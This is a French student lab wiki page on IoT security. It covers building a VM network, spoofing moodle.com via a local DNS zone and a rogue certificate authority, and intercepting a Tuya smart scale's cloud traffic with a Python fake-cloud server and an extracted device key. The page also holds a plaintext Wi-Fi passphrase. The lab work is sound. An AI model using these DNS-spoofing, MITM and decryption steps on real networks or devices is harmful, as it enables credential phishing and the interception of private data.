.z]......R0..P..........
..
12:36:50.310055 ARP, Request who-has 172.16.10.105 tell 172.16.10.105, length 46
..........|.-L..
i........
i........ ....>....
12:36:53.526624 IP 172.16.10.105.48314 > 172.16.10.1.8886: Flags [S], seq 6547, win 4380, options [mss 1460], length 0
E..,......O&..
i..
...".........`...!|........
12:36:53.526669 IP 172.16.10.1.8886 > 172.16.10.105.48314: Flags [R.], seq 0, ack 6548, win 0, length 0
E..(..@.@..E..
...
i"...........P...JA..
12:36:54.536817 IP 172.16.10.105.44185 > 172.16.10.1.8886: Flags [S], seq 6567, win 4380, options [mss 1460], length 0
E..,......O%..
i..
...".........`...1.........
12:36:54.536835 IP 172.16.10.1.8886 > 172.16.10.105.44185: Flags [R.], seq 0, ack 6568, win 0, length 0
E..(..@.@..E..
...
i"...........P...ZN..
12:36:55.545631 IP 172.16.10.105.26626 > 172.16.10.1.8886: Flags [S], seq 6589, win 4380, options [mss 1460], length 0
E..,......O$..
i..
.h.".........`...v
........
12:36:55.545649 IP 172.16.10.1.8886 > 172.16.10.105.26626: Flags [R.], seq 0, ack 6590, win 0, length 0
E..(..@.@..E..
...
i".h.........P.......
12:36:56.554680 IP 172.16.10.105.16244 > 172.16.10.1.8886: Flags [S], seq 6611, win 4380, options [mss 1460], length 0
E..,......O#..
i..
.?t".........`.............
12:36:56.554698 IP 172.16.10.1.8886 > 172.16.10.105.16244: Flags [R.], seq 0, ack 6612, win 0, length 0
E..(..@.@..E..
...
i".?t........P....G..
^C
57 packets captured
57 packets received by filter
0 packets dropped by kernel
</syntaxhighlight>port 8886 chez tuya ?

<syntaxhighlight lang="linux-config">
root@SE5:/etc/apache2/sites-available# openssl s_server -accept 8886 -cert /etc/ssl/apache/ca.crt -key /etc/ssl/apache/ca.key -debug
Using default temp DH parameters
ACCEPT
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c1930 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c1930 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c1930 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 00 00 00 00 d6aG91IFR1eV....
0020 - 00 00 00 00 00 00 00 00-04 00 ae 00 ff 01 00 00 ................
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 00 ...:..BAohBAohb.
0010 - 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0020 - 00 00 00 00 00 00 00 00-04 00 ae 00 ff 01 00 00 ................
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c1930 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c1930 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c1930 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 00 00 00 00-00 00 00 00 00 00 00 00 d6aG............
0020 - 00 00 00 00 00 00 00 00-04 00 ae 00 ff 01 00 00 ................
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c1930 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c1930 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c1930 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
</syntaxhighlight>trouver un mdp dans l'appli nedis /data/data/com.nedis.smartlife/shared_prefs

decouverte de tinytuya : https://github.com/jasonacox/tinytuya<syntaxhighlight lang="python3">
import socket
import tinytuya
import json

LOCAL_KEY = '674d29fb978a1705'

IP_BALANCE = '172.16.10.105'

print(f"[*] Démarrage du Faux Cloud Tuya...")
print(f"[*] Clé utilisée : {LOCAL_KEY}")

server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind(('0.0.0.0', 8886))
server_socket.listen(1)

print("[*] En attente de la balance sur le port 8886...")
print("[*] Monte sur la balance maintenant !")

while True:
try:
client, addr = server_socket.accept()
print(f"\n[+] Connexion reçue de {addr[0]} !")

data = client.recv(4096)

if data:
print(f"[i] {len(data)} octets reçus (chiffrés). Tentative de décodage...")

try:
d = tinytuya.OutletDevice('DUMMY_ID', IP_BALANCE, LOCAL_KEY)
d.set_version(3.3) # Version standard WiFi

decrypted = d._decode_payload(data)

if decrypted:
print("\n" + "="*40)
print("donnés :")
print("="*40)
parsed = json.loads(decrypted)
print(json.dumps(parsed, indent=4))

if 'dps' in parsed:
print("\nVALEURS :")
for k, v in parsed['dps'].items():
print(f"- Data Point {k} : {v}")
print("="*40)
else:
print("[-] Échec du décryptage (Format inconnu ou clé incorrecte pour ce paquet)")

except Exception as e:
print(f"[-] Erreur de décodage : {e}")

client.close()

except KeyboardInterrupt:
print("\nArrêt.")
break
except Exception as e:
print(f"Erreur serveur : {e}")
</syntaxhighlight>

SE5 IdO sécurité des objets 2025/2026 b1

2025-12-02T15:44:31Z

Vdetrez : /* Nedis Wi-Fi Smart Personal Scales */

[[Fichier:1107px-Titre page.png|sans_cadre|820x820px]]

= Serveur virtuel (17/09) =
Dans un premier temps, on vient créer un serveur virtuel sur <code>capbreton</code> avec la commande <code>xen-create-image --hostname=SE5.vdetrez --dhcp --dir=/usr/local/xen --size=10G --memory=2G --dist=daedalus --bridge=bridgeStudents</code>

Ensuite, sur capbreton dans le dossier <code>/etc/network/interfaces.d</code> on vient créer un fichier <code>g1_vdetrez</code> pour mettre en place une nouvelle interface dans le VLAN 410. <syntaxhighlight lang="linux-config">
auto Trunk.410
iface Trunk.410 inet manual
vlan-raw-device Trunk
up ip link set $IFACE up
down ip link set $IFACE down

auto g1_vdetrez
iface g1_vdetrez inet manual
bridge_ports Trunk.410
up ip link set $IFACE up
down ip link set $IFACE down

</syntaxhighlight>

On a maintenant accès à la machine SE5.vdetrez (en ayant évidemment fait l'erreur de mettre "." à la place de "-") et on vient y configurer nos adresses IPv4.

Mon adresse IPv4 routée est la <code>172.26.145.100</code> et mon IPv4 dans le VLAN 410 est <code>172.16.10.0</code> <syntaxhighlight lang="linux-config">
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
address 172.26.145.110
netmask 255.255.255.0
gateway 172.26.145.251
# post-up ethtool -K eth0 tx off

auto eth1
iface eth1 inet static
address 172.16.10.0/24
#
# The commented out line above will disable TCP checksumming which
# might resolve problems for some users. It is disabled by default
#

</syntaxhighlight>

On vérifie avec la commande <code>ip a</code><syntaxhighlight lang="linux-config">
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:41 brd ff:ff:ff:ff:ff:ff
inet 172.26.145.110/24 brd 172.26.145.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 2001:660:4401:6050:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 853sec preferred_lft 753sec
inet6 2a01:c916:2047:c850:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 2591853sec preferred_lft 604653sec
inet6 fe80::216:3eff:fe23:7441/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:42 brd ff:ff:ff:ff:ff:ff
inet 172.16.10.0/24 brd 172.16.10.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe23:7442/64 scope link
valid_lft forever preferred_lft forever

</syntaxhighlight>

Et on constate que notre serveur a accès à Internet avec la commande <code>ping 8.8.8.8</code>

= Point d'accès WiFi (29/09) =
Pour l'instant, nous mettons de côté ce point du TP car il n'est pas utile pour la suite.

= Sécurisation WiFi par WPA2-PSK =

Pour communiquer avec le routeur <code>Cisco</code>, on branche le port série en USB et on se connecte avec la commande <code>minicom -D /dev/ttyUSB0 -b 9600</code>. La première étape fut la création du SSID <code>SE5-SSID10</code>.<syntaxhighlight lang="linux-config">
dot11 ssid SE5-SSID10

vlan 410

authentication open

authentication key-management wpa version 2

wpa-psk ascii Cisco2025

exit
</syntaxhighlight>
Puis, on configure l'interface <code>Dot11Radio0</code><syntaxhighlight lang="linux-config">
interface dot11radio 0

encryption mode ciphers aes-ccm

ssid SE5-SSID10

station-role root

no shutdown
</syntaxhighlight>Après cela, on retourne sur notre serveur virtuel et on y implémente un serveur DHCP pour l'attribution des IP aux machines se connectant sur le routeur. On retrouve cette configuration dans <code>/etc/dhcp/dhcpd.conf</code><syntaxhighlight lang="linux-config">
# dhcpd.conf

option domain-name "plil.info";
option domain-name-servers ns.plil.info;

default-lease-time 600;
max-lease-time 7200;

ddns-update-style none;

authoritative;

subnet 172.16.10.0 netmask 255.255.255.0 {
range 172.16.10.100 172.16.10.200;
option domain-name-servers 172.16.10.1;
option routers 172.16.10.1;
default-lease-time 600;
max-lease-time 7200;
}
</syntaxhighlight>Puis, on implémente un serveur DNS minimal dans le fichier <code>/etc/bind/named.conf.options</code><syntaxhighlight lang="linux-config">
options {
directory "/var/cache/bind";

recursion yes;
allow-query {172.16.10.0/24; 127.0.0.1;};

forwarders {
8.8.8.8;
1.1.1.1;
};

dnssec-validation auto;

listen-on {127.0.0.1; 172.16.10.1;};
listen-on-v6 { none; };
};
</syntaxhighlight>Et enfin, on met en place une mascarade entre le VLAN 410 et le routeur du réseau des salles de projets pour donner l'accès à Internet.<syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

= Interception de flux (30/09) =

== Redirection par DNS ==
Pour cette partie, on va ajouter une zone primaire à notre serveur DNS avec le nom Internet du site que l'on veut rediriger vers notre machine.

Ici, ce sera le merveilleux <code>moodle.com</code>

D'abord, on modifie <code>/etc/bind/named.conf.local</code><syntaxhighlight lang="linux-config">
//
// Do any local configuration here
//

// Consider adding the 1918 zones here, if they are not used in your
// organization
//include "/etc/bind/zones.rfc1918";

zone "moodle.com" {
type master;
file "/etc/bind/db.moodle.com";
};
</syntaxhighlight>Puis, on crée la fameuse zone <code>db.moodle.com</code> dans le même répertoire <syntaxhighlight lang="linux-config">
$TTL 200
@ IN SOA ns.moodle.com. admin.moodle.com. (
5 ;
3600 ;
1800 ;
604800 ;
86400 ;
)
IN NS ns.moodle.com.
ns IN A 172.16.10.1
@ IN A 172.16.10.1
www IN CNAME ns
</syntaxhighlight>Pour vérifier si notre configuration est correcte, on exécute ces deux commandes :

<code>sudo named-checkconf</code>

<code>sudo named-checkzone moodle.com /etc/bind/db.moodle.com</code>

== Redirection réseau ==
Dans cette partie, on ajoute une règle <code>iptables</code> pour rediriger le flux TCP vers un port local, le <code>8080</code>.

<code>iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-ports 8080</code><syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
0 0 REDIRECT 6 -- eth0 * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 redir ports 8080

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

== Serveur apache sécurise (04/10) ==

Dans un premier temps, on va créer un certificat auto-signé :

<code>openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/apache/apache-selfsigned.key -out /etc/ssl/apache/apache-selfsigned.crt -subj "/C=FR/ST=Nord/L=Lille/O=Popo/CN=moodle.com"</code>

Puis, on configure <code>Apache2</code>
<syntaxhighlight lang="linux-config">
GNU nano 7.2 /etc/apache2/sites-available/secure-site.conf
<VirtualHost *:443>
ServerName moodle.com

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/apache/apache.crt
SSLCertificateKeyFile /etc/ssl/apache/apache.key

# Optionnel : log
ErrorLog ${APACHE_LOG_DIR}/ssl-error.log
CustomLog ${APACHE_LOG_DIR}/ssl-access.log combined
</VirtualHost>

# Redirection HTTP ^f^r HTTPS
<VirtualHost *:80>
ServerName moodle.com
Redirect permanent / https://moodle.com/
</VirtualHost>
</syntaxhighlight>

Maintenant, en prévision de la suite (voir explication dans Machine virtuelle Android), on va créer une autorité de certification nommée CertiFiable :

<code>openssl req -x509 -new -nodes -keyout ca.key -sha256 -days 365 -out ca.crt -subj "/CN=CertiFiable"</code>

Puis, on vient générer une demande de signature de certificat :

<code>openssl req -new -newkey rsa:2048 -nodes -keyout apache.key -out apache.csr -subj "/CN=moodle.com"</code>

Enfin, on vient signer le site avec le certificat de CertiFiable :

<code>openssl x509 -req -in apache.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out apache.crt -days 365 -sha256</code>

= Machine virtuelle <code>android</code> =

== Première tentative ==
Actuellement, si on navigue sur internet et que l'on se rend sur moodle.com, on atterrit bien sûr le faux Moodle, mais comme le téléphone ne connait pas l'autorité de certification nommé CertiFiable, on a le droit à ce magnifique message de connexion non sécurisée :

[[Fichier:Avertissement moodle.png|sans_cadre]][[Fichier:Moodle le magnifique.png|sans_cadre]]

Malheureusement, il est aujourd'hui impossible d'ajouter facilement une autorité de certification sur son téléphone.

C'est pour cela qu'une solution proposée est d'installer une machine virtuelle d'une ancienne version d'<code>Android</code> où il était possible d'en ajouter.

En ayant suivi ce tuto (https://help.clouding.io/hc/en-us/articles/4405454393756-How-to-virtualize-Android-with-QEMU-KVM), j'ai réussi à installer une VM sur Zabeth4 (j'ai dû prendre une autre iso car celle du site était inaccessible).

J'ai installé <code>VNC Viewer</code> pour pouvoir manipuler la machine virtuelle.

En étant sur la VM, j'ai pu me rendre compte qu'il n'était pas possible de se connecter au WiFi, c'est la connexion du pc qui est simulé comme un réseau WiFi dans la VM.

J'ai pu réfléchir à deux solutions avant que la VM ne crash d'elle-même et soit impossible à redémarrer...

La première est toute simple, connecter la Zabeth directement au WiFi, ce qui est difficile à distance. La seconde, qui est je pense possible, est de changer la carte réseau dans les fichiers de conf de la VM pour mettre celle supportant le WiFi.

Je n'ai donc pu tester aucune de ces deux solutions, la VM n'étant plus.

== Seconde tentative ==

qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw

qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw -cdrom *android-x86*.iso -boot d

qemu-system-x86_64 -m 2048 -enable-kvm -cpu host -smp 2 -display sdl -drive file=android.img,format=raw,if=virtio -usb -device usb-host,vendorid=0x148f,productid=0x5370

== Ultime tentative ==
//TO DO Ajouter méthode routage android Android studio.

= Machine <code>android</code> (06/10) =
Pour cette dernière partie, j'ai retrouvé une tablette sous <code>Android 4.4 KitKat</code> qui permet d'ajouter des autorités de certification.

C'est donc ce que j'ai fait :

[[Fichier:Photo_certifiable.png|sans_cadre]]

Maintenant, on constate en se connectant sur moodle.com à partir de cette tablette que l'on est bien redirigé vers le faux site et qu'il est sécurisé avec le magnifique cadenas vert.

[[Fichier:Photo moodle.png|sans_cadre]]

(cette page web date du 06/10/25, elle n'est plus valable depuis le 10/10/25...)

= Nedis Wi-Fi Smart Personal Scales =

Dans ce second TP, nous allons jouer avec ce pèse personne de nedis.

Dans un premier temps, j'ai connecté la balance au résau SE5-SSID10.

Puis j'ai remarqué que quand je tentai de me peser, la balance affiche err2.

Après une courte investigation, il s'agit d'une balance qui émet des signaux électriques pour analyser la composition corporelle donc si on se pèse avec des chaussures, cela pose problème.

Pour la suite du projet, on se pèsera avec les mains.

[[Fichier:Poid_sur_app_nedis.png|sans_cadre]]

On constate sur ces paquets la requête de la balance pour obtenir une IP, puis le moment ou elle l'obtient. A chaque fois qu'elle redémarre, elle vient récupérer une IP, elle n'aura donc pas forcement la 105.

[[Fichier:WS connection balance.png|sans_cadre|858x858px]]

Je peux donc ping ma balance depuis mon pc (celui qui host ma vm)

[[Fichier:PIng balance.png|sans_cadre]]

tcpdump -i eth1 -n port 53:<syntaxhighlight lang="linux-config">
14:46:51.115996 IP 172.16.10.105.49153 > 172.16.10.1.53: 13861+ A? m2.tuyaeu.com. (31)
14:46:51.125611 IP 172.16.10.1.53 > 172.16.10.105.49153: 13861 3/0/0 A 3.120.92.134, A 18.184.31.90, A 35.156.44.172 (79)
14:46:51.168250 IP 172.16.10.105.49153 > 172.16.10.1.53: 59035+ A? a3.tuyaeu.com. (31)
14:46:51.177967 IP 172.16.10.1.53 > 172.16.10.105.49153: 59035 3/0/0 A 18.198.62.99, A 18.158.227.228, A 3.67.116.46 (79)
14:46:51.703179 IP 172.16.10.102.57661 > 172.16.10.1.53: 30982+ AAAA? a1.tuyaeu.com. (31)
14:46:51.706085 IP 172.16.10.102.57662 > 172.16.10.1.53: 15654+ A? a1.tuyaeu.com. (31)
14:46:51.713159 IP 172.16.10.1.53 > 172.16.10.102.57661: 30982 3/0/0 AAAA 2a05:d014:afa:af02:262a:be09:e328:ff21, AAAA 2a05:d014:afa:af01:87dc:dc67:35a1:5bfe, AAAA 2a05:d014:afa:af00:1ee2:1f00:e061:e8bf (115)
14:46:51.715736 IP 172.16.10.1.53 > 172.16.10.102.57662: 15654 3/0/0 A 3.78.92.3, A 35.159.150.3, A 3.121.33.91 (79)

56 packets captured
56 packets received by filter
0 packets dropped by kernel
[4343449.827028] device eth1 left promiscuous mode

</syntaxhighlight>visiblement notre balance communque avec tuya via m2.tuyaeu.com et a3.tuyaeu.com

et la vm android a1.tuyaeu.com

tcpdump -i eth1 -n port 53: après avoir crée dns, site, etc a1.tuyaeu.com<syntaxhighlight lang="linux-config">
root@SE5:/etc/apache2/sites-available# tcpdump -i eth1 -n port 53
[5544865.540418] device eth1 entered promiscuous mode
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), snapshot length 262144 bytes
12:30:55.146437 IP 172.16.10.1.53 > 172.16.10.100.17620: 23156 5/0/0 CNAME reddit.map.fastly.net., A 151.101.129.140, A
151.101.1.140, A 151.101.65.140, A 151.101.193.140 (129)
12:30:55.168796 IP 172.16.10.1.53 > 172.16.10.100.24249: 64622 2/0/0 CNAME us-central1-gcp.api.sc-gw.com., A 35.190.43.
134 (109)
12:30:55.322498 IP 172.16.10.100.26394 > 172.16.10.1.53: 29420+ A? scontent-cdg4-1.xx.fbcdn.net. (46)
12:30:56.095075 IP 172.16.10.100.62675 > 172.16.10.1.53: 46396+ A? cf-st.sc-cdn.net. (34)
12:30:56.121796 IP 172.16.10.1.53 > 172.16.10.100.62675: 46396 1/0/0 A 3.163.248.4 (50)
12:30:56.539099 IP 172.16.10.1.53 > 172.16.10.100.26394: 29420 1/0/0 A 185.60.219.2 (62)
12:30:57.289763 IP 172.16.10.100.7071 > 172.16.10.1.53: 14247+ A? usc1-gcp-v62.api.snapchat.com. (47)
12:30:57.302767 IP 172.16.10.1.53 > 172.16.10.100.7071: 14247 2/0/0 CNAME usc1-gcp-v62.api.sc-gw.com., A 34.120.159.232
(103)
12:30:58.490060 IP 172.16.10.105.49153 > 172.16.10.1.53: 50294+ A? m2.tuyaeu.com. (31)
12:30:58.490174 IP 172.16.10.1.53 > 172.16.10.105.49153: 50294* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)
12:30:58.540041 IP 172.16.10.105.49153 > 172.16.10.1.53: 23785+ A? a3.tuyaeu.com. (31)
12:30:58.540132 IP 172.16.10.1.53 > 172.16.10.105.49153: 23785* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)
12:31:00.979103 IP 172.16.10.100.63625 > 172.16.10.1.53: 63574+ A? gql-fed.reddit.com. (36)
12:31:00.997721 IP 172.16.10.1.53 > 172.16.10.100.63625: 63574 5/0/0 CNAME reddit.map.fastly.net., A 151.101.65.140, A
151.101.129.140, A 151.101.193.140, A 151.101.1.140 (135)
12:31:04.461507 IP 172.16.10.102.63971 > 172.16.10.1.53: 20792+ A? discord.com. (29)
12:31:04.461519 IP 172.16.10.102.54572 > 172.16.10.1.53: 15444+ Type65? discord.com. (29)
12:31:04.493098 IP 172.16.10.1.53 > 172.16.10.102.63971: 20792 5/0/0 A 162.159.138.232, A 162.159.136.232, A 162.159.12
8.233, A 162.159.135.232, A 162.159.137.232 (109)
12:31:04.493306 IP 172.16.10.1.53 > 172.16.10.102.54572: 15444 1/0/5 Type65 (158)
18 packets captured
18 packets received by filter
0 packets dropped by kernel

</syntaxhighlight>tcpdump -i eth1 host 172.16.10.105 and not port 53 -A<syntaxhighlight lang="linux-config">
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), snapshot length 262144 bytes
12:36:41.148741 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4......<\)...........
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....X..........
.....
.. plil.info................
12:36:41.161323 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4g.....[.}T..........
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....X..........
.....
.. plil.info................
12:36:41.167616 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
i....P....Y...c....
12:36:41.490919 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
i.r.u....).........
12:36:41.993612 ARP, Request who-has 172.16.10.105 tell 172.16.10.105, length 46
..........|.-L..
i........
i..HE.....f........
12:36:42.011664 ARP, Request who-has 172.16.10.1 tell 172.16.10.105, length 46
..........|.-L..
i........
.....up. ..........
12:36:42.011672 ARP, Reply 172.16.10.1 is-at 00:16:3e:23:74:42 (oui Unknown), length 28
..........>#tB..
...|.-L..
i
12:36:42.019053 IP 172.16.10.105.3872 > 172.16.10.1.8886: Flags [S], seq 6509, win 4380, options [mss 1460], length 0
E..,......O>..
i..
.. "....m....`....<........
12:36:42.019100 IP 172.16.10.1.8886 > 172.16.10.105.3872: Flags [R.], seq 0, ack 6510, win 0, length 0
E..(..@.@..E..
...
